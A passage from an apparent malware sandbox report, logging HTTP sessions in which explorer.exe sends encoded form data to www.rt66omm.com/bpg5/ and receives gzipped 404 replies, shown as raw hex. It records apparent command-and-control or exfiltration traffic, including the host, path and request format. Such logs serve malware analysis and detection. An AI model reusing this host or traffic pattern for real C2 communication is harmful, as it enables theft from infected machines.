                                        Data Ascii: yDcF=kMzVzvfSEGSo6_aeA8cqyHwfcyYKm3WPCisjQrGdlBlVd7AuxjngTDHN6Akpuw0VxR~opUdIpLrLYSHGhWALmz3kcIwuSefcwkX_liITyvA-suXayJkA4-eWKLXhLhHFYGysRfGcAMqXMVkCgqJWBI~1NqApQA5BRtFkMuQaG7YiETV2oNTAw_pzRZqRmN6YZ3gHt4k3NWuIPr8wpapzzC56kADmFY2SUdxzfdJ40CdzhR8-vHYf8Y6txdE3bIBHai3sbR4o3I(REpmf9risgIWS9SsYYPN7R7UE~sVN0XPDU8T41s44rC75YNqi7hqTg9J0lVqWPYAvUdKH5jq9AQ2kMM82JjXcbxFdtk4ClN7ECFF01kBzSgGaYSUoO6bUGa1w0m0Wi3bL0whFthBb6B43Ngt7EvpyYfq6(z(DkqmAW8W0PwlPWtmS5W2RVIz04djgjmOKYORi6Z7BJc70KZn_hQbgJtahF-Zj(XlAlBVM5cRSoRyHsLxR6AM8TC(Ra-YbVX6rWEgQtujvdSw5vcJkHqQFXqvO6BTbzN8IzzjUjpjl8rDHNxTvwznb3oxLUnErEg8TC0(0V6jIUmUX7mi3ZPDs~MdldrQMC5Nkeek4OsqlHSQ-7vVl0HdaKDGe22UtK8r5IiM6Rl92xNv5rhw9O7azXUs37UAZtWsCznyhHKeFOxsAz1uySvLAaNNDTbGLQ8LqEzl4YTy3EaIeQCGYXM2w~45g~EktQt61Mc5NRNYa0cfby9yIkb8Gp_aAag89W1a3nlLxwmCGm9TaqRHuQRKR80D-2qaXE_ohw_uK4u6TfyruwnXLqfeB~lWPF2b7MYGE4Gcs5VTW2z7LLfCO27sEteC33vCT1WmFwMORobhq~0RIXaV4KWOfkhAwiVIplzrzqC5ztRDU7C33jn8X6UEZJ5Y5UUNGNztN1ab9y_0Z60shH0g3KexlS-uhlVYcePmYYKA6QtOaY3vHoSDmwGA7vZyLwJpXizFkL4QquP1tWkj7wn(pmDfzuELHhibrURUOWGTiKnzNCsrtrTBxXGGexRITTu2K5rWkV5QDJjNlWyaFihQhpzm9MqVzfUAOFqOxNDUmMIl-jGmPOmgN0du-g3KUrwFCqN33Wjjq(yiyrQopKJMsM-o8SEHboP3Etyjv9gw8PzdPRcocv1MokJA-U4UDYTgrAoo_FLpK4Z6a7ZjHt4qtWUbv5mvErm4-ahLecmNul8kSj4XDh2VvuuJHmZx2HTzmukJOpj1R7rZB4BVIw80AKDyq9dEESkW0YY7a1gAzuyiYnFLh37oyt83Iacqvlvq5qPQK3TBWVHiRBWx-KdCdIKpM5cByYfXecM(xUwRyHzI6pVUnqxLCkH1At5GYdecGPRAu~UCXExFojk8LJCvi5hYmJfPQbNR4RGhXXe9FeBGcPsmBrIsIzT3UA2QVl0XNoD5exr2zbaHz92c7dlsSNp8d9uFmNg).


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        11192.168.2.549734118.27.125.17280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:40:04.780544043 CEST153OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.rt66omm.com
                                        Connection: close
                                        Content-Length: 1482
                                        Cache-Control: no-cache
                                        Origin: http://www.rt66omm.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.rt66omm.com/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 49 46 38 54 48 30 74 43 62 68 34 68 71 56 58 7a 77 55 7a 37 6d 33 66 4a 45 7e 70 48 4e 41 69 73 47 46 72 4a 42 31 53 72 64 78 39 68 31 6a 6b 59 4b 28 38 54 4e 50 6a 28 6e 35 57 33 6a 55 4c 34 58 68 4f 6d 36 64 33 47 50 57 2d 71 58 34 43 76 45 4c 42 64 73 74 65 4a 4c 4c 69 31 70 4b 43 31 47 4c 2d 6c 37 76 70 75 6d 4e 4e 48 56 74 53 76 6f 6e 4a 34 43 4e 4b 69 72 51 5f 51 58 57 51 49 63 64 62 61 67 44 6c 49 72 64 41 6d 33 5a 63 37 65 43 4e 6c 2d 62 43 33 55 4f 37 6c 43 4e 52 36 6d 43 6a 35 43 53 36 6d 50 71 72 37 59 4f 6f 6c 67 4b 48 54 58 6a 62 63 34 49 50 61 2d 69 4b 74 4e 69 5f 47 48 4b 6e 52 59 70 4d 4e 43 51 5f 38 71 50 31 4e 55 4f 53 50 51 73 43 4b 43 6a 6e 4e 50 35 51 68 55 53 65 46 56 30 74 52 47 45 34 55 46 76 61 4a 6d 72 47 61 31 61 65 77 68 75 69 56 65 61 6f 64 50 32 44 33 51 32 7a 69 30 47 71 55 4e 4a 4f 7e 33 4e 6a 47 62 43 31 51 6b 73 4d 46 37 47 77 76 38 5a 7a 6f 6c 42 61 5a 61 45 4d 35 34 65 30 44 57 67 55 56 5f 6c 64 6e 75 57 34 44 50 30 4d 54 70 48 72 49 69 51 53 65 49 61 49 36 43 33 49 41 79 4a 71 36 65 28 5a 31 65 63 71 4e 46 31 58 41 6c 36 2d 57 79 41 5f 45 49 53 36 36 35 71 53 50 33 48 57 4c 66 64 63 51 55 45 53 7a 73 52 76 50 51 43 70 33 56 42 6a 39 46 28 49 4b 4b 54 68 66 39 75 4a 79 6e 4e 47 57 72 36 58 50 50 45 32 76 78 5a 56 7e 47 42 66 63 34 42 37 28 67 41 61 37 51 63 5a 74 70 30 5a 4a 7a 72 6f 55 34 71 4d 36 62 56 52 31 35 36 50 4e 46 41 4a 74 77 44 75 69 4e 31 4f 32 39 72 74 61 71 36 63 41 36 34 70 57 76 6e 4e 64 37 38 56 52 76 51 30 4a 77 35 46 46 48 51 43 47 67 37 69 66 45 52 41 4f 72 6b 65 6c 68 75 4d 37 2d 43 41 65 30 35 63 4a 63 7e 2d 38 68 66 4c 54 54 6b 32 66 72 65 74 54 64 39 45 45 54 43 32 6b 45 45 37 37 45 67 77 41 65 70 77 64 72 65 4a 49 39 6e 4a 50 6d 43 7a 32 65 74 45 63 37 49 45 63 62 30 6f 6d 49 63 51 52 4d 48 64 30 4e 6d 79 65 61 51 6f 77 69 47 42 48 56 6d 4f 34 5a 59 51 64 79 39 71 58 34 65 30 6a 4e 50 73 34 72 42 52 35 36 6f 54 32 73 44 78 70 2d 42 33 67 76 39 4e 65 39 66 34 36 66 37 4f 62 61 76 43 44 51 76 49 62 76 58 49 38 73 45 2d 53 45 36 50 34 43 6b 39 74 6a 58 74 6b 4a 30 48 6b 65 53 70 58 55 6b 75 6c 38 6e 4d 79 62 72 75 59 4f 69 53 7e 72 59 52 4d 45 50 4f 65 57 45 6a 54 30 6b 54 36 56 30 5a 43 74 34 41 4d 74 78 71 58 4f 6e 38 59 7a 6a 53 54 58 56 79 44 77 44 65 39 38 6b 6d 49 61 32 5f 76 59 4b 52 4f 61 7a 6c 6b 63 51 30 69 6a 66 51 44 72 42 59 67 75 69 46 7a 61 41 4f 48 2d 75 6d 33 61 74 5a 74 34 33 31 4f 69 30 56 4f 76 37 39 34 63 4f 78 69 48 71 4d 66 32 55 42 52 6f 44 56 44 6f 6e 52 5a 32 36 74 54 42 67 6c 76 50 76 70 4c 33 50 72 4c 64 6f 33 6f 56 66 49 35 4c 70 39 4c 42 66 58 41 2d 59 70 44 33 67 4d 67 36 6b 49 63 46 46 33 61 36 79 63 51 75 5a 4f 39 72 49 6e 57 44 68 67 62 54 72 34 47 71 76 55 70 41 67 6e 45 38 37 4c 30 6c 5a 46 64 67 64 4a 4a 58 6b 72 30 77 34 41 42 59 37 6c 39 42 50 4d 5a 4a 72 79 4b 61 45 33 55 71 4d 43 79 6f 6d 61 67 6c 55 2d 70 47 4a 6a 32 6a 47 5f 30 6f 48 57 65 72 43 6a 59 5a 68 46 54 74 6c 31 39 75 37 32 64 33 46 46 50 39 69 4e 73 44 73 66 6e 6c 34 47 38 6a 43 65 76 4f 47 47 77 46 64 43 34 62 63 7a 62 5a 33 78 76 74 62 46 4b 75 72 61 39 61 72 56 47 46 7e 77 4d 42 4e 5a 58 74 58 71 32 6e 4a 58 7a 4a 37 46 6b 4e 34 32 62 36 43 41 77 44 4e 62 73 6b 48 46 76 4a 31 66 7e 73 57 61 6e 62 50 41 6a 37 6f 53 6e 59 6a 69 46 64 4d 51 4c 57 65 33 71 68 70 58 6a 32 69 68 68 48 47 4a 62 42 32 79 6f 6a 6f 76 4a 57 34 61 6f 76 70 31 34 44 76 56 39 67 38 69 47 56 74 58 34 7a 67 6b 66 4e 4f 37 7e 7a 55 49 4c 76 45 45 67 4b 5a 6b 6a 45 32 63 78 37 4a 59 53 65 4a 4a 41 65 76 69 63 6c 6e 37 63 4e 35 63 6e 76 6c 74 42 4e 69 43 41 34 59 64 46 6d 6a 55 32 6c 53 65 31 37 51 64 4b 32 42 6a 77 51 7e 7a 64 38 63 78 48 42 69 34 69 78 6f 6b 53 64 34 6e 45 67 41 32 32 2d 39 6a 6c 41 78 4b 6e 7a 5a 36 7a 77 47 72 48 41 45 65 53 55 56 6a 47 6f 56 69 64 65 44 49 61 4c 28 31 6a 7a 67 67 6a 37 35 50 52 42 42 47 59 68 42 72 53 34 49 75 4a 43 32 4b 62 72 34 76 7a 39 68 56 34 37 4f 77 75 4b 47 5f 36 61 7e 55 62 62 51 41 75 51 6e 4c 43 35 7e 38 61 59 4b 6f 6a 39 76 4b 65 33 75 6f 33 35 4c 30 33 35 4c 4c 71 61 53 54 35 2d
                                        Data Ascii: yDcF=bnjuuu8f3kRfdIF8TH0tCbh4hqVXzwUz7m3fJE~pHNAisGFrJB1Srdx9h1jkYK(8TNPj(n5W3jUL4XhOm6d3GPW-qX4CvELBdsteJLLi1pKC1GL-l7vpumNNHVtSvonJ4CNKirQ_QXWQIcdbagDlIrdAm3Zc7eCNl-bC3UO7lCNR6mCj5CS6mPqr7YOolgKHTXjbc4IPa-iKtNi_GHKnRYpMNCQ_8qP1NUOSPQsCKCjnNP5QhUSeFV0tRGE4UFvaJmrGa1aewhuiVeaodP2D3Q2zi0GqUNJO~3NjGbC1QksMF7Gwv8ZzolBaZaEM54e0DWgUV_ldnuW4DP0MTpHrIiQSeIaI6C3IAyJq6e(Z1ecqNF1XAl6-WyA_EIS665qSP3HWLfdcQUESzsRvPQCp3VBj9F(IKKThf9uJynNGWr6XPPE2vxZV~GBfc4B7(gAa7QcZtp0ZJzroU4qM6bVR156PNFAJtwDuiN1O29rtaq6cA64pWvnNd78VRvQ0Jw5FFHQCGg7ifERAOrkelhuM7-CAe05cJc~-8hfLTTk2fretTd9EETC2kEE77EgwAepwdreJI9nJPmCz2etEc7IEcb0omIcQRMHd0NmyeaQowiGBHVmO4ZYQdy9qX4e0jNPs4rBR56oT2sDxp-B3gv9Ne9f46f7ObavCDQvIbvXI8sE-SE6P4Ck9tjXtkJ0HkeSpXUkul8nMybruYOiS~rYRMEPOeWEjT0kT6V0ZCt4AMtxqXOn8YzjSTXVyDwDe98kmIa2_vYKROazlkcQ0ijfQDrBYguiFzaAOH-um3atZt431Oi0VOv794cOxiHqMf2UBRoDVDonRZ26tTBglvPvpL3PrLdo3oVfI5Lp9LBfXA-YpD3gMg6kIcFF3a6ycQuZO9rInWDhgbTr4GqvUpAgnE87L0lZFdgdJJXkr0w4ABY7l9BPMZJryKaE3UqMCyomaglU-pGJj2jG_0oHWerCjYZhFTtl19u72d3FFP9iNsDsfnl4G8jCevOGGwFdC4bczbZ3xvtbFKura9arVGF~wMBNZXtXq2nJXzJ7FkN42b6CAwDNbskHFvJ1f~sWanbPAj7oSnYjiFdMQLWe3qhpXj2ihhHGJbB2yojovJW4aovp14DvV9g8iGVtX4zgkfNO7~zUILvEEgKZkjE2cx7JYSeJJAevicln7cN5cnvltBNiCA4YdFmjU2lSe17QdK2BjwQ~zd8cxHBi4ixokSd4nEgA22-9jlAxKnzZ6zwGrHAEeSUVjGoVideDIaL(1jzggj75PRBBGYhBrS4IuJC2Kbr4vz9hV47OwuKG_6a~UbbQAuQnLC5~8aYKoj9vKe3uo35L035LLqaST5-sEGBGkjAP7~piBXFSIDNo1ufKr7Lf7h45CpIwS0o5RDWW3MdwPRO1d7v48MhKrh6GmxJON9zaQ6et36bs9SiHxBPSyzN~SDqfaqZFW610QyA8lrwwuNQ).
                                        May 23, 2023 09:40:06.056252003 CEST154INHTTP/1.1 404 Not Found
                                        Date: Tue, 23 May 2023 07:40:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Server: LiteSpeed
                                        x-powered-by: PHP/8.1.19
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        cache-control: no-cache, must-revalidate, max-age=0
                                        link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"
                                        content-encoding: gzip
                                        vary: Accept-Encoding,Accept-Encoding
                                        x-turbo-charged-by: LiteSpeed
                                        Data Raw: 66 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01 5b 7a
                                        Data Ascii: f34H+<huFO0{2J:iWh%HB =" 9$#/*=h^v?`?`O^I2?";72`itMzsNO'!?)|q#)JZ}t9/yVT0K+V_>Qu8.ei\$q$?K=B\=-ZH_#M({Iu'RhXY*hBc/iI~s|4*<~reVp")9bfk$%[p(7!y|0J+ga}B:(-b\%Q9;KhYJah()eE8|*G_)Vr3IWUIsAg<\(XpF&s1\9YY&.9YavZF1qNYyOpFS2{&DH2$#'_>JKXUysQ<\,=9S2+Cj("/NS'}q?|mf'G!~]zK_?vosER_9"N?L@="eUcEx"lQB@rZTo_>efJ@Z)PF8PXSrcvvF*RUE"*5[z
                                        May 23, 2023 09:40:06.056308985 CEST156INData Raw: cb cf d6 ae b8 bb 68 9d 07 0a 67 19 16 94 a6 e5 31 ab 66 bf e5 07 2b 16 e0 e6 13 4c 94 84 c9 32 b1 d6 be 49 06 3a 9f d4 f1 37 f2 f4 cf ff b5 d9 94 14 55 1c 26 34 c8 cf bb 24 2e 8f 34 7a aa 62 05 e1 27 31 f5 4c f3 ac 5e e2 aa a2 45 10 92 22 92 a0
                                        Data Ascii: hg1f+L2I:7U&4$.4zb'1L^E"oO(-O=7zDpB&N$kiWueGSE^k-lk~qJO$hMyEY|rpz|sO?we}=)>@7h/
                                        May 23, 2023 09:40:06.056329012 CEST157INData Raw: 2d 52 3b 4c 79 2d d9 16 d1 2a 14 0a b6 69 bb f0 20 17 3a 7e 07 39 ed f8 99 4d e0 c4 d8 25 15 55 9c db 19 00 2a 20 e7 2a 13 86 07 e2 66 5f ba 54 bf de ca ae b1 dd 96 bd bb f2 53 42 d3 a7 db b5 45 59 2d be 81 f6 29 b3 4b 1a 05 f8 76 d3 88 74 9b 83
                                        Data Ascii: -R;Ly-*i :~9M%U* *f_TSBEY-)KvtS:@7jpT/h{[JXFo*dK,IH^R?d#r\/`6FJxwQNP:\%Fj`JhjE:8HQTqIHDS&x-v
                                        May 23, 2023 09:40:06.056349039 CEST157INData Raw: 8b bc b9 02 93 93 c4 92 29 62 ca 49 d3 30 4b 5a f4 f4 4b f8 99 d1 31 2f 34 03 5d 1d f1 25 3b 4e 1c c9 82 ee eb 2e 39 dc 53 f6 3b 3c cb 13 b7 79 5c 23 97 be 74 70 40 8e 56 b2 1b 8f f8 d8 4f d9 8a 9e 69 c1 82 fd 15 97 19 9b 7f f9 1e 36 cf ca 18 43
                                        Data Ascii: )bI0KZK1/4]%;N.9S;<y\#tp@VOi6CV}vB7J%`MH?*Rh~7OR?}\I(vn@ ;Oiq4UN>A0i`>wtr0N[{K-:vekSs/`$mz'!euM[l
                                        May 23, 2023 09:40:06.056369066 CEST159INData Raw: 31 63 34 38 0d 0a c4 c7 06 ba 07 9f 06 89 cf ea 43 c5 c7 36 82 d1 e2 63 03 da 83 2d 16 59 b1 7c 72 7b 32 a4 11 1f f9 26 51 32 74 2d b0 2d 9f dc f5 c7 89 8f 0d 74 0f 3e 0d 12 9f f5 87 8a 8f 6d 04 a3 c5 c7 06 b4 07 5b 2c 93 67 f9 e4 f6 64 48 23 3e
                                        Data Ascii: 1c48C6c-Y|r{2&Q2t--t>m[,gdH#>QC6c-Y|r{2(~@ ~F0Z|l@{"+OnO4%>'>6=4H|>T|l#->6=b''Cy%>qcS>Tc-BV=8c'/Oj!2|]RF
                                        May 23, 2023 09:40:06.056392908 CEST160INData Raw: be 1e e7 22 87 08 3f b3 d1 41 c1 aa b2 c0 17 3b a7 4d 3e 18 b4 60 c6 73 eb ea eb d1 b9 df 40 94 89 90 46 52 3f ca 6d 86 82 9f f4 b1 18 34 5b d7 23 0e c4 68 2a 0d af 8b e1 40 55 93 39 67 6e 64 06 9b af b4 8c 5c 72 72 89 ed 52 4e 2d 30 5b 2e e9 c9
                                        Data Ascii: "?A;M>`s@FR?m4[#h*@U9gnd\rrRN-0[.R=v4_4f_VJm}~m&k$TY['H+[>}u <h& o\\vU2HE.:P~Z_r\|VBIw{l9
                                        May 23, 2023 09:40:06.056412935 CEST161INData Raw: 23 ec de 26 7d 87 c5 6b 50 8d 9b f8 2d 20 eb 24 5f 07 d8 b2 c3 1a 24 e3 d5 d5 60 92 2d 90 75 92 af 03 6c d9 5b 0d 92 71 73 1d 4c b2 05 b2 4e f2 75 80 2d bb aa 41 32 6e ab 83 49 b6 40 d6 49 be 0e b0 65 3f 35 48 c6 0d 75 30 c9 16 c8 3a c9 d7 01 b6
                                        Data Ascii: #&}kP- $_$`-ul[qsLNu-A2nI@Ie?5Hu0:&Y':= 7$[ $_{$_}Z $o~<v@aRoT}@j\LH]}%OH'Sz_?ORXTX/>B9ig$V# 1Fib,_0]
                                        May 23, 2023 09:40:06.056433916 CEST163INData Raw: c9 8f 44 e5 5a ed 94 af df 10 97 df ea ac b3 01 ff a8 f0 d9 c8 6b 87 c3 35 be 2a 7d 78 be 3b cc 2a cd d8 23 7f 91 13 6b 33 11 17 ef e2 f1 34 45 7f a6 8b 1e ab fa 59 3f 3a fa 82 32 4b e2 c8 58 5c bc f3 2f d8 e6 a7 2f bc 3f 64 d9 45 18 bf d6 40 e0
                                        Data Ascii: DZk5*}x;*#k34EY?:2KX\//?dE@p@uPp`"sJ:OYg1@dm5`~n,ivTY;J)x(REs'JgAN xjb6gRl'EPIeGT ;b.}iW}
                                        May 23, 2023 09:40:06.056453943 CEST164INData Raw: cd dc 8c 07 8e 09 8a df b5 51 07 f5 a8 fb 33 0a bd 82 d5 b1 c8 ce 87 e3 4d 79 35 10 f0 60 76 0d 85 6f e7 98 0c c5 ca 34 7e 07 85 f1 b0 bf 84 09 29 cb 9f be 58 04 ee d7 c9 c4 21 c6 7c b4 ae b0 21 50 bb 38 33 08 8e 9d 03 ad 34 5a a5 a1 d9 55 e2 30
                                        Data Ascii: Q3My5`vo4~)X!|!P834ZU0KeZ}Ym~)wEt;WmfkBb@'S>2JAINh3L\$kzbN`e,\8:fxeF.wk,UyAc:.YC
                                        May 23, 2023 09:40:06.056474924 CEST165INData Raw: 85 c2 86 7b e7 c1 ee 5e 2d 13 f8 1c 86 7b 80 6a 2f c9 3e 7e a5 91 d0 5a d0 8d dd 26 97 36 24 d6 c5 e2 26 71 fa ad 23 ff df 25 43 d5 0a d4 3e 48 61 a8 fe af be 54 ac db 97 9d 25 75 c6 38 0c 74 02 e7 2d 5c 7e d6 7f 99 98 fb 16 f7 f2 48 59 3a 95 5b
                                        Data Ascii: {^-{j/>~Z&6$&q#%C>HaT%u8t-\~HY:[?k9Tp!ZzaYBlqIii)r]{|:/ibRn)[e-KN[^=-`/!S1^)Ltfe*lS.%fWR<y"
                                        May 23, 2023 09:40:06.338793039 CEST167INData Raw: 4f 71 7a e8 46 c1 36 58 d1 b6 17 1a 27 4e f3 73 f5 4b f5 96 d3 2f e0 92 88 ab 5f 99 5c 1f 49 94 bd b0 94 c4 9a ed 2a 0e 56 25 5f 40 ab 5a 61 a6 df eb 92 5f 46 0e 9e 1d 0a 4d 72 ad 19 93 57 0e 20 21 05 25 e2 ee a8 89 89 ba 7b 58 c2 3f ec 1c 69 b5
                                        Data Ascii: OqzF6X'NsK/_\I*V%_@Za_FMrW !%{X?i,Z(4^KUl02Wv&vnIX sz<3iNnwR]*ZK3Y-%4JBt^ >27IGl>V#2z^3(Ap'?0[c


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        12192.168.2.549735118.27.125.17280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:40:07.800791025 CEST193OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.rt66omm.com
                                        Connection: close
                                        Content-Length: 186
                                        Cache-Control: no-cache
                                        Origin: http://www.rt66omm.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.rt66omm.com/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 50 35 38 42 6d 30 74 43 37 68 34 74 4b 56 58 35 51 55 31 37 6d 37 68 4a 46 36 66 48 2d 51 69 76 58 31 72 4a 54 4e 53 73 64 78 36 70 56 6a 67 48 61 28 74 54 4e 4f 43 28 6c 74 57 33 6a 51 4c 35 31 4a 4f 67 37 64 30 45 5f 57 38 6d 33 34 50 76 45 48 49 64 73 68 4f 4a 4c 6a 69 31 73 43 43 30 46 6a 2d 6a 65 62 70 37 47 4e 78 4d 31 73 51 76 6f 71 54 34 43 39 34 69 6f 45 5f 51 47 61 51 4a 4a 68 62 65 33 33 6c 42 4c 64 4e 72 58 5a 4b 77 63 4c 44 28 2d 58 5a 36 48 66 6b 79 54 31 41 30 6c 48 30 36 51 29 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: yDcF=bnjuuu8f3kRfdP58Bm0tC7h4tKVX5QU17m7hJF6fH-QivX1rJTNSsdx6pVjgHa(tTNOC(ltW3jQL51JOg7d0E_W8m34PvEHIdshOJLji1sCC0Fj-jebp7GNxM1sQvoqT4C94ioE_QGaQJJhbe33lBLdNrXZKwcLD(-XZ6HfkyT1A0lH06Q).
                                        May 23, 2023 09:40:08.813437939 CEST195INHTTP/1.1 404 Not Found
                                        Date: Tue, 23 May 2023 07:40:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Server: LiteSpeed
                                        x-powered-by: PHP/8.1.19
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        cache-control: no-cache, must-revalidate, max-age=0
                                        link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"
                                        content-encoding: gzip
                                        vary: Accept-Encoding,Accept-Encoding
                                        x-turbo-charged-by: LiteSpeed
                                        Data Raw: 31 39 66 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad 